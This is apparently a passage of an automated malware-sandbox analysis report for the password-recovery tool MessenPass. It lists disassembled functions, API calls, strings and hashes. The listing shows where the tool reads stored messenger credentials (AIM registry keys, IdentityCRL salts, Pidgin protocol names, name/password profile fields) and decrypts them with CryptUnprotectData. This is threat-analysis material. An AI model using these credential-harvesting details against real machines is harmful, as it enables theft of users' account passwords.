                                                                                                    • Opcode ID: e5345bd8614f8dcd2d1c308e40a1d6c5d5934fe6eb63f7ee50686fc0058a6628
                                                                                                    • Instruction ID: d6ea28dcef1c43b6611216e97a84ccd45a66baff8fdfae9b3007c4cad2cc92f3
                                                                                                    • Opcode Fuzzy Hash: e5345bd8614f8dcd2d1c308e40a1d6c5d5934fe6eb63f7ee50686fc0058a6628
                                                                                                    • Instruction Fuzzy Hash: 2F31307324E3127AF714B9336D02BEB27898F11B66F24082FFA09B11C1EE7D5A55419E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004124D4, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                    • API String ID: 633282248-1996832678
                                                                                                    • Opcode ID: 011dc5066fb19440f4804de798d1f4ec702ddfa9614fe7101a4430c164161ab3
                                                                                                    • Instruction ID: 0d87bc4a3c90cd549b7ee136a842ac2d8ae4f17c90590582d174715666fd6da4
                                                                                                    • Opcode Fuzzy Hash: 011dc5066fb19440f4804de798d1f4ec702ddfa9614fe7101a4430c164161ab3
                                                                                                    • Instruction Fuzzy Hash: CB31C7B2801215BEDB10AE549D939CAF76CAF10315F1441AFF514B2181EABC9FD08BAD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040A242, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                    • API String ID: 710961058-601624466
                                                                                                    • Opcode ID: 01ba515a634d510913fe2f235f109e28ad47b200226b44b89f882b7dae9418f4
                                                                                                    • Instruction ID: 690333ed3326df0f6eed54148ed3e596883a3b3feedda5c4c7dc15c04e40e9a4
                                                                                                    • Opcode Fuzzy Hash: 01ba515a634d510913fe2f235f109e28ad47b200226b44b89f882b7dae9418f4
                                                                                                    • Instruction Fuzzy Hash: 5B61AE31900208AFDF14DF54CC86EDE7B79EF08314F1001AAF909AB1D2DB799A94CB55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040DD65, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 178stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040DD8B
                                                                                                    • strlen.MSVCRT ref: 0040DD93
                                                                                                    • strlen.MSVCRT ref: 0040DD9D
                                                                                                    • memset.MSVCRT ref: 0040DDEB
                                                                                                    • memset.MSVCRT ref: 0040DDF9
                                                                                                    • memset.MSVCRT ref: 0040DE07
                                                                                                    • memset.MSVCRT ref: 0040DE1F
                                                                                                    • sprintf.MSVCRT ref: 0040DE46
                                                                                                    • GetPrivateProfileStringA.KERNEL32(?,name,00417C88,?,000003FF,?), ref: 0040DE74
                                                                                                    • GetPrivateProfileStringA.KERNEL32(?,password,00417C88,?,000003FF,?), ref: 0040DE96
                                                                                                      • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                                                                                      • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                                                                                    • sprintf.MSVCRT ref: 0040DF73
                                                                                                    • GetPrivateProfileStringA.KERNEL32(?,name,00417C88,?,000003FF,?), ref: 0040DFA2
                                                                                                    • GetPrivateProfileStringA.KERNEL32(?,password,00417C88,?,000003FF,?), ref: 0040DFC0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: memset$PrivateProfileString$sprintfstrlen$_mbscat_mbscpy
                                                                                                    • String ID: name$password$profile %d
                                                                                                    • API String ID: 3544386798-2462908242
                                                                                                    • Opcode ID: e7b187a0626f75cc39379d2bba276785f1ae62edefe99cb3f3bfbc37819d7c60
                                                                                                    • Instruction ID: 9e46ac0295d5b354e730bb81602d93da8fcedc4e5bf25204c2bd197169999166
                                                                                                    • Opcode Fuzzy Hash: e7b187a0626f75cc39379d2bba276785f1ae62edefe99cb3f3bfbc37819d7c60
                                                                                                    • Instruction Fuzzy Hash: DA61A5B284425DAEDB20DB54DC40FDA77BCAF15304F1444EAA559E3141DBB89FC88FA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004125F1, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: sprintf$memset$_mbscpy
                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                    • API String ID: 3402215030-3842416460
                                                                                                    • Opcode ID: ea06b0d74ada23c5ef34a7984231b84acf2e1d6cd6bcfe81b43f4a3791556408
                                                                                                    • Instruction ID: a5bfc8ec8e60557daa4b034ce7241d6b1778398f1e76627a293d7ac05c42f781
                                                                                                    • Opcode Fuzzy Hash: ea06b0d74ada23c5ef34a7984231b84acf2e1d6cd6bcfe81b43f4a3791556408
                                                                                                    • Instruction Fuzzy Hash: D24173B280121DBADB21EE54DC45FEB776CAF14309F0400ABF518E2142E6789FD88BA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004010D0, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 111COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00401118
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401126
                                                                                                      • Part of subcall function 00406D6B: ShellExecuteA.SHELL32(?,open,?,00417C88,00417C88,00000005), ref: 00406D81
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00401161
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 0040116F
                                                                                                    • LoadCursorA.USER32(00000067), ref: 00401186
                                                                                                    • SetCursor.USER32(00000000,?,?), ref: 0040118D
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040119D
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004011B1
                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004011BF
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 004011C7
                                                                                                    • EndDialog.USER32(?,00000001), ref: 004011E5
                                                                                                    • DeleteObject.GDI32(?), ref: 004011F1
                                                                                                    • SetWindowTextA.USER32(?,MessenPass), ref: 00401204
                                                                                                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040121C
                                                                                                    • SetDlgItemTextA.USER32(?,000003EC,?), ref: 0040122D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Item$Text$Window$ChildColorCursorFromPoint$BrushDeleteDialogExecuteLoadModeObjectShell
                                                                                                    • String ID: MessenPass
                                                                                                    • API String ID: 2410034309-1347981195
                                                                                                    • Opcode ID: 843b1ff313390d25d34e2be648776c3666369c8dad7882cf094c1c7715f69dbe
                                                                                                    • Instruction ID: 61c274a33cdd550ae885db2c0d410d86e96b4f8b628e001bd40ef85afa118776
                                                                                                    • Opcode Fuzzy Hash: 843b1ff313390d25d34e2be648776c3666369c8dad7882cf094c1c7715f69dbe
                                                                                                    • Instruction Fuzzy Hash: 6D31D271500A4AFBDB026FA0DD49EEABB7AFB44301F508236F915E61B0C7759861DB88
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040C50E, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _strcmpi
                                                                                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                    • API String ID: 1439213657-1959339147
                                                                                                    • Opcode ID: 42829d603ed6219f05e00acd70f5009b327ef2ea2f3e71e7fd8bced316a66bba
                                                                                                    • Instruction ID: dd15bb3cc8bdf641e1a17555e2464251a39e176c696be1a009fdff25c7df10cc
                                                                                                    • Opcode Fuzzy Hash: 42829d603ed6219f05e00acd70f5009b327ef2ea2f3e71e7fd8bced316a66bba
                                                                                                    • Instruction Fuzzy Hash: DE011AB229A32178F9286A773C07BD70A488B51F7BF70065FF408E40C1FE5C968054AD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00404D18, Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 33libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,004084A6), ref: 00404D23
                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00404D37
                                                                                                    • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00404D43
                                                                                                    • GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00404D4F
                                                                                                    • GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00404D5B
                                                                                                    • GetProcAddress.KERNEL32(?,CryptHashData), ref: 00404D67
                                                                                                    • GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00404D73
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                    • String ID: CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$advapi32.dll
                                                                                                    • API String ID: 2238633743-1621422469
                                                                                                    • Opcode ID: 11447201b65d866f37edbf99505d086a0ab8926e77609814987dd4a6320f0436
                                                                                                    • Instruction ID: 844867562ca0833f301e0ac6fd14d3db62e181894ebadeef568166b0b2be0524
                                                                                                    • Opcode Fuzzy Hash: 11447201b65d866f37edbf99505d086a0ab8926e77609814987dd4a6320f0436
                                                                                                    • Instruction Fuzzy Hash: 4FF09774940B48AECB30AF759C09E86BEE1EF9C7007224D2EE2C553650DA799084CE88
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00404578, Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 240COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • wcslen.MSVCRT ref: 0040459A
                                                                                                    • memset.MSVCRT ref: 004045BA
                                                                                                    • wcschr.MSVCRT ref: 0040464E
                                                                                                    • _wcsncoll.MSVCRT ref: 00404667
                                                                                                    • memcpy.MSVCRT ref: 00404700
                                                                                                    • wcschr.MSVCRT ref: 00404714
                                                                                                    • wcscpy.MSVCRT ref: 0040472B
                                                                                                    • memcpy.MSVCRT ref: 004047E3
                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?), ref: 004047F5
                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0040473C
                                                                                                      • Part of subcall function 00404CE0: FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                                                                                    • memcpy.MSVCRT ref: 0040483B
                                                                                                      • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                                                                                      • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Freememcpy$LibraryLocalwcschr$AddressLoadProc_wcsncollmemsetwcscpywcslen
                                                                                                    • String ID: ?L@$Microsoft_WinInet
                                                                                                    • API String ID: 1802959924-2674056311
                                                                                                    • Opcode ID: fe56d977aabb073792e25c405abe676263accf88416be629dc76c317c79dc49e
                                                                                                    • Instruction ID: 38d9b8d34b298c31677a0e9ec7c60157448ec74f6fc12d2487dcaf445e5773ed
                                                                                                    • Opcode Fuzzy Hash: fe56d977aabb073792e25c405abe676263accf88416be629dc76c317c79dc49e
                                                                                                    • Instruction Fuzzy Hash: 7FA16DB6D002199BDF10DFA5D844AEEB7B8FF44304F00846BEA19F7281E7789A45CB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004137CE, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004137F3
                                                                                                      • Part of subcall function 00413646: strlen.MSVCRT ref: 00413653
                                                                                                    • strlen.MSVCRT ref: 0041380F
                                                                                                    • memset.MSVCRT ref: 00413849
                                                                                                    • memset.MSVCRT ref: 0041385D
                                                                                                    • memset.MSVCRT ref: 00413871
                                                                                                    • memset.MSVCRT ref: 00413897
                                                                                                      • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C9BA
                                                                                                      • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9E6
                                                                                                      • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9FC
                                                                                                      • Part of subcall function 0040C9C7: memcpy.MSVCRT ref: 0040CA33
                                                                                                      • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA3D
                                                                                                    • memcpy.MSVCRT ref: 004138CE
                                                                                                      • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C96C
                                                                                                      • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C996
                                                                                                      • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA0E
                                                                                                    • memcpy.MSVCRT ref: 0041390A
                                                                                                    • memcpy.MSVCRT ref: 0041391C
                                                                                                    • _mbscpy.MSVCRT ref: 004139F3
                                                                                                    • memcpy.MSVCRT ref: 00413A24
                                                                                                    • memcpy.MSVCRT ref: 00413A36
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset$strlen$_mbscpy
                                                                                                    • String ID: salu
                                                                                                    • API String ID: 3691931180-4177317985
                                                                                                    • Opcode ID: a28751cfe978eb37453970bb265a1e64262579446a4253816dc0a22a7f9660ca
                                                                                                    • Instruction ID: 50f97ef88cf8910c77a3c81ceda6bafe80676b1d4533e7ed44b9b26706654b38
                                                                                                    • Opcode Fuzzy Hash: a28751cfe978eb37453970bb265a1e64262579446a4253816dc0a22a7f9660ca
                                                                                                    • Instruction Fuzzy Hash: 48712DB290011DAADF10EF95DC819DE77B8BF08348F1445BAF548E7141DB78AB888F95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00403EDF, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 103COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                                                                                      • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                                                                                    • memset.MSVCRT ref: 00403F2E
                                                                                                    • memset.MSVCRT ref: 00403F42
                                                                                                    • memset.MSVCRT ref: 00403F56
                                                                                                    • sprintf.MSVCRT ref: 00403F77
                                                                                                    • _mbscpy.MSVCRT ref: 00403F93
                                                                                                    • sprintf.MSVCRT ref: 00403FCA
                                                                                                    • sprintf.MSVCRT ref: 00403FFB
                                                                                                    Strings
                                                                                                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403FA5
                                                                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403FF5
                                                                                                    • MessenPass, xrefs: 00403FE1
                                                                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F71
                                                                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403F06
                                                                                                    • <table dir="rtl"><tr><td>, xrefs: 00403F8D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$MessenPass
                                                                                                    • API String ID: 113626815-2158351146
                                                                                                    • Opcode ID: 00ac9a161666d359e30a85352218d100d67a3872f7ac0cc1d46ad38c70204dfb
                                                                                                    • Instruction ID: 7e850c38df9f1f0d15d36b6f1642bcd7d5b849b9a1e92852595dac58af72d1cd
                                                                                                    • Opcode Fuzzy Hash: 00ac9a161666d359e30a85352218d100d67a3872f7ac0cc1d46ad38c70204dfb
                                                                                                    • Instruction Fuzzy Hash: 963195B2904258BFDB11DBA59C42EDE7BACAF14304F0440ABF508B7141DA799FC88B99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00403EF6, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 98COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                                                                                      • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                                                                                    • memset.MSVCRT ref: 00403F2E
                                                                                                    • memset.MSVCRT ref: 00403F42
                                                                                                    • memset.MSVCRT ref: 00403F56
                                                                                                    • sprintf.MSVCRT ref: 00403F77
                                                                                                    • _mbscpy.MSVCRT ref: 00403F93
                                                                                                    • sprintf.MSVCRT ref: 00403FCA
                                                                                                    • sprintf.MSVCRT ref: 00403FFB
                                                                                                    Strings
                                                                                                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403FA5
                                                                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403FF5
                                                                                                    • MessenPass, xrefs: 00403FE1
                                                                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F71
                                                                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403F06
                                                                                                    • <table dir="rtl"><tr><td>, xrefs: 00403F8D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$MessenPass
                                                                                                    • API String ID: 113626815-2158351146
                                                                                                    • Opcode ID: c760e4dabb0e80b2edcbd537a5374e1093b1ba24307009f5b58eb46458df0706
                                                                                                    • Instruction ID: 526b9c6c735ab5766b9493b9c4eecad717bc7371a22eeca07e3dbb649928e63f
                                                                                                    • Opcode Fuzzy Hash: c760e4dabb0e80b2edcbd537a5374e1093b1ba24307009f5b58eb46458df0706
                                                                                                    • Instruction Fuzzy Hash: 6E3187B2900218BADB51DB95DC42EDE7BACAF54304F0440A7F50CB7141DA799FC88B69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004062DB, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 168stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00406306
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040631A
                                                                                                      • Part of subcall function 00406ED6: ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED
                                                                                                    • memset.MSVCRT ref: 00406349
                                                                                                    • memset.MSVCRT ref: 00406368
                                                                                                    • memset.MSVCRT ref: 0040637A
                                                                                                    • strcmp.MSVCRT ref: 004063B9
                                                                                                    • _mbscpy.MSVCRT ref: 0040644F
                                                                                                    • _mbscpy.MSVCRT ref: 0040646B
                                                                                                    • strcmp.MSVCRT ref: 004064B3
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004064E5
                                                                                                    • CloseHandle.KERNEL32(?), ref: 004064EE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Filememset$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                    • String ID: ---
                                                                                                    • API String ID: 3240106862-2854292027
                                                                                                    • Opcode ID: 99f8cf32e1f3e44123f9acb0b31c0e69de81d1680ab2a584d9d4eb233c64d807
                                                                                                    • Instruction ID: 14ccde3f01574b0ce453d66bedc824b09869edf18580a01976bfbb4e6d9b59b2
                                                                                                    • Opcode Fuzzy Hash: 99f8cf32e1f3e44123f9acb0b31c0e69de81d1680ab2a584d9d4eb233c64d807
                                                                                                    • Instruction Fuzzy Hash: A7517572C0415DAACF20DB949C819DEBBBCAF15314F1140FBE509B3181DA389BD98BAD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040E725, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 142registrystringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                    • memset.MSVCRT ref: 0040E768
                                                                                                    • memset.MSVCRT ref: 0040E77C
                                                                                                    • memset.MSVCRT ref: 0040E790
                                                                                                    • memset.MSVCRT ref: 0040E7A8
                                                                                                      • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                                                                                    • sprintf.MSVCRT ref: 0040E7D8
                                                                                                    • strlen.MSVCRT ref: 0040E806
                                                                                                    • _mbscpy.MSVCRT ref: 0040E888
                                                                                                    • _mbscpy.MSVCRT ref: 0040E89B
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040E8ED
                                                                                                    Strings
                                                                                                    • Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users, xrefs: 0040E735
                                                                                                    • Password, xrefs: 0040E7DE
                                                                                                    • %s\Login, xrefs: 0040E7D2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: memset$_mbscpy$CloseEnumOpensprintfstrlen
                                                                                                    • String ID: %s\Login$Password$Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users
                                                                                                    • API String ID: 1782299107-1248239246
                                                                                                    • Opcode ID: c4d16bc47cbd25a94772c531631938f0df6b0302f4f9fef13228118c965c7629
                                                                                                    • Instruction ID: fd41fae155906cc5ed66380c8c1da9a21ab341a1702a4efca81b6986be60196d
                                                                                                    • Opcode Fuzzy Hash: c4d16bc47cbd25a94772c531631938f0df6b0302f4f9fef13228118c965c7629
                                                                                                    • Instruction Fuzzy Hash: 4B41C4B2C0011CAEDB21EBA59C41BDEBBBC9F59304F4040EAE549A3101D6399F99CF68
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040E8FD, Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 100COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _strcmpi
                                                                                                    • String ID: prpl-gg$prpl-irc$prpl-jabber$prpl-msn$prpl-novell$prpl-oscar$prpl-yahoo
                                                                                                    • API String ID: 1439213657-1061492575
                                                                                                    • Opcode ID: d08d5dad979f9fb4092b5930b19311ec033bd7c838c8b2128e13e64409b95641
                                                                                                    • Instruction ID: 427b895755571877c56e738dc42ee4b060dd70cd0f3c6fd0f8b1603a1220432f
                                                                                                    • Opcode Fuzzy Hash: d08d5dad979f9fb4092b5930b19311ec033bd7c838c8b2128e13e64409b95641
                                                                                                    • Instruction Fuzzy Hash: 5031D6B124C3455ED730EE22954A7EB77D4AB90719F20082FF488A22C1EB7C59554B9F
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004103F1, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 99registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,7661E520,00000000,?,0040DCC1,?), ref: 0041041E
                                                                                                    • RegOpenKeyExA.ADVAPI32(?,Dynamic Salt,00000000,00020019,?,?,7661E520,00000000,?,0040DCC1,?), ref: 00410436
                                                                                                    • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,7661E520,00000000,?,0040DCC1), ref: 0041045F
                                                                                                    • RegCloseKey.ADVAPI32(?,?,7661E520,00000000,?,0040DCC1), ref: 00410509
                                                                                                      • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                                                                                      • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                                                                                    • memcpy.MSVCRT ref: 004104C8
                                                                                                    • memcpy.MSVCRT ref: 004104DD
                                                                                                      • Part of subcall function 004100A4: RegOpenKeyExA.ADVAPI32(004104FD,Creds,00000000,00020019,004104FD,00000040,0041B008,?,?,004104FD,?,?,?,?), ref: 004100C8
                                                                                                      • Part of subcall function 004100A4: memset.MSVCRT ref: 004100EA
                                                                                                      • Part of subcall function 004100A4: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 004101E7
                                                                                                      • Part of subcall function 004100A4: RegCloseKey.ADVAPI32(?), ref: 004101F8
                                                                                                    • LocalFree.KERNEL32(0040DCC1, av,?,?,?,7661E520,00000000), ref: 00410500
                                                                                                    • RegCloseKey.ADVAPI32(?,?,7661E520,00000000,?,0040DCC1,?), ref: 00410512
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                    • String ID: av$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                    • API String ID: 2768085393-2259093224
                                                                                                    • Opcode ID: d648e9b0c95eff2677d72af7b673b930fecaf3740d0545a91529973bbe74cb9a
                                                                                                    • Instruction ID: a3322e4f6880ec2e25c1dd16e8e651f617ea5ab7975a499ff40f994b3e8bdadf
                                                                                                    • Opcode Fuzzy Hash: d648e9b0c95eff2677d72af7b673b930fecaf3740d0545a91529973bbe74cb9a
                                                                                                    • Instruction Fuzzy Hash: B631E7B690011DABDB119B95EC45EEFBBBDEF48348F004066FA05F2111E7749A848BA8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

